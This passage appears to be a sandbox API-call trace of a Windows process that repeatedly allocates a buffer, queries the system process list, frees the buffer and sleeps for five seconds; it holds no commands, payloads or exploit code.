returned 0x0 [0243.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.571] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.598] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.645] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.707] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0243.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0243.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 